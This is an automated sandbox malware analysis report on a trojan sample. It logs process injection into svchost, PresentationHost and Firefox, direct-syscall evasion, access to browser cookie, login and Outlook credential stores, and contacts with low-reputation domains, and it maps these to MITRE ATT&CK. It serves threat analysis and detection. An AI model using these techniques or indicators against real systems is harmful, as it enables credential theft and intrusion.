          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B89B3 mov esi, dword ptr fs:[00000030h]1_2_032B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B89B3 mov eax, dword ptr fs:[00000030h]1_2_032B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B89B3 mov eax, dword ptr fs:[00000030h]1_2_032B89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BE9E0 mov eax, dword ptr fs:[00000030h]1_2_032BE9E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032629F9 mov eax, dword ptr fs:[00000030h]1_2_032629F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032629F9 mov eax, dword ptr fs:[00000030h]1_2_032629F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C69C0 mov eax, dword ptr fs:[00000030h]1_2_032C69C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032649D0 mov eax, dword ptr fs:[00000030h]1_2_032649D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FA9D3 mov eax, dword ptr fs:[00000030h]1_2_032FA9D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov ecx, dword ptr fs:[00000030h]1_2_03252835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A830 mov eax, dword ptr fs:[00000030h]1_2_0326A830
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D483A mov eax, dword ptr fs:[00000030h]1_2_032D483A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D483A mov eax, dword ptr fs:[00000030h]1_2_032D483A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BC810 mov eax, dword ptr fs:[00000030h]1_2_032BC810
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BE872 mov eax, dword ptr fs:[00000030h]1_2_032BE872
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BE872 mov eax, dword ptr fs:[00000030h]1_2_032BE872
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C6870 mov eax, dword ptr fs:[00000030h]1_2_032C6870
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_006581F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_006581F7
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0062A364 SetUnhandledExceptionFilter,0_2_0062A364
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0062A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0062A395

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | NtClose: Direct from: 0x76F02B6C
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | NtCreateKey: Direct from: 0x76F02C6C
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | NtSetInformationThread: Direct from: 0x76F02B4C
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | NtOpenSection: Direct from: 0x76F02E0C
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | NtSetInformationThread: Direct from: 0x76EF63F9
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BEC
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | NtCreateFile: Direct from: 0x76F02FEC
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | NtOpenFile: Direct from: 0x76F02DCC
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | NtTerminateThread: Direct from: 0x76F02FCC
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | NtUnmapViewOfSection: Direct from: 0x76F02D3C
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | NtCreateMutant: Direct from: 0x76F035CC
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | NtResumeThread: Direct from: 0x76F036AC
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | NtReadFile: Direct from: 0x76F02ADC
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | NtDelayExecution: Direct from: 0x76F02DDC
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | NtResumeThread: Direct from: 0x76F02FBC
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | NtCreateUserProcess: Direct from: 0x76F0371C
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\PresentationHost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Section loaded: NULL target: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe protection: read write
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Section loaded: NULL target: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Thread register set: target process: 7764
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 29B4008
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Code function: 0_2_00658C93 LogonUserW
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Code function: 0_2_00603B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Code function: 0_2_00604A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Code function: 0_2_00664EF5 mouse_event
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\nJ8mJTmMf0.exe"
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe | Process created: C:\Windows\SysWOW64\PresentationHost.exe "C:\Windows\SysWOW64\PresentationHost.exe"
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Code function: 0_2_006581F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Code function: 0_2_00664C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
          Source: nJ8mJTmMf0.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: nJ8mJTmMf0.exe, TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4121602275.0000000001A81000.00000002.00000001.00040000.00000000.sdmp, TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000000.1895094072.0000000001A81000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4121602275.0000000001A81000.00000002.00000001.00040000.00000000.sdmp, TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000000.1895094072.0000000001A81000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4121602275.0000000001A81000.00000002.00000001.00040000.00000000.sdmp, TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000000.1895094072.0000000001A81000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4121602275.0000000001A81000.00000002.00000001.00040000.00000000.sdmp, TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000000.1895094072.0000000001A81000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Code function: 0_2_0062886B cpuid
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Code function: 0_2_006350D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Code function: 0_2_00642230 GetUserNameW
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Code function: 0_2_0063418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Code function: 0_2_00604AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

          Stealing of Sensitive Information

          Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000003.00000002.4125575598.00000000082C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.1978005632.0000000003080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.1977710626.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.4121057875.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.1978344060.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.4121859503.00000000045C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\PresentationHost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Windows\SysWOW64\PresentationHost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Windows\SysWOW64\PresentationHost.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
          Source: C:\Windows\SysWOW64\PresentationHost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\PresentationHost.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\PresentationHost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
          Source: C:\Windows\SysWOW64\PresentationHost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
          Source: C:\Windows\SysWOW64\PresentationHost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Windows\SysWOW64\PresentationHost.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
          Source: nJ8mJTmMf0.exe | Binary or memory string: WIN_81
          Source: nJ8mJTmMf0.exe | Binary or memory string: WIN_XP
          Source: nJ8mJTmMf0.exe | Binary or memory string: WIN_XPe
          Source: nJ8mJTmMf0.exe | Binary or memory string: WIN_VISTA
          Source: nJ8mJTmMf0.exe | Binary or memory string: WIN_7
          Source: nJ8mJTmMf0.exe | Binary or memory string: WIN_8
          Source: nJ8mJTmMf0.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

          Remote Access Functionality

          Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000003.00000002.4125575598.00000000082C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.1978005632.0000000003080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.1977710626.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.4121057875.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.1978344060.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.4121859503.00000000045C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Code function: 0_2_00676596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe | Code function: 0_2_00676A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket
          MITRE ATT&CK Matrix (listed by tactic column; a leading number is the count the matrix shows against that technique)

          Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
          Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
          Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
          Execution: 2 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
          Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
          Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 312 Process Injection; Startup Items; Scheduled Task/Job; At
          Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Valid Accounts; 2 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 312 Process Injection
          Credential Access: 1 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
          Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 116 System Information Discovery; 151 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 3 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
          Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
          Command and Control: 4 Ingress Tool Transfer; 1 Encrypted Channel; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
          Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
          Behavior Graph ID: 1466073 | Sample: nJ8mJTmMf0.exe | Start date: 02/07/2024 | Architecture: WINDOWS | Score: 100

          Start
            DNS/IP: www.adoby.xyz (Performs DNS queries to domains with low reputation); www.wepayassessments.com; 18 other IPs or domains
            Signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 5 other signatures
            -> nJ8mJTmMf0.exe 4 (started)
                 Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
                 -> svchost.exe (started)
                      Signatures: Maps a DLL or memory area into another process
                      -> TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe (injected)
                           DNS/IP: www.kosherphonestore.com.cdn.hstgr.net 84.32.84.112, 49736, 80 NTT-LT-ASLT Lithuania; synergon.space 109.95.158.127, 49758, 49759, 49760 DHOSTING-ASWarsawPolandPL Poland; 9 other IPs or domains
                           Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                           -> PresentationHost.exe 13 (started)
                                Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 2 other signatures
                                -> firefox.exe (started)



Antivirus detection (Source / Detection / Scanner / Label):
• nJ8mJTmMf0.exe: 58%, ReversingLabs, Win32.Trojan.Leonem
• nJ8mJTmMf0.exe: 100%, Joe Sandbox ML
No Antivirus matches
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1466073
Start date and time: 2024-07-02 14:05:05 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 7s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: nJ8mJTmMf0.exe (renamed because the original name is a hash value)
Original Sample Name: 8e2c2721d94a488e27b363152a56ea079a7932b41144b71f385d8b37ca70aa2e.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/5@15/11
